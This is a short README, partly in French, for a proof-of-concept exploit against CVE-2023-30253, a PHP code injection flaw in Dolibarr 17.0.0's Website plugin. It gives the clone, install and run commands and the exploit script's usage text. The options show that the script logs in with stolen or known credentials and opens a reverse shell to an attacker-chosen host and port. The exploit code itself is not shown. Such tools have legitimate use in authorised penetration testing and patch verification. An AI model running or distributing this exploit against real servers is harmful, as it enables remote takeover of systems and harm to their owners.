
Je n'ai pas trouvé de PoC pour CVE-2023-30253, donc j'ai développé un PoC efficace.
CVE-2023-30253 PoC
Ceci est mon PoC pour la CVE-2023-30253 (Dolibarr 17.0.0 Injection de code PHP). Lorsque le plugin CMS Website (core) est activé, un attaquant authentifié peut exécuter des commandes à distance via une injection de code PHP en contournant les restrictions de l'application.
Clone the repository:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help show this help message and exit
-lhost LHOST Local Host (this host will receive the shell)
-lport LPORT Local PORT
-rhost RHOST Rhost url, example: http://site.com/
-user USER Username for Dolibarr
-pass PASSWORD Password for Dolibarr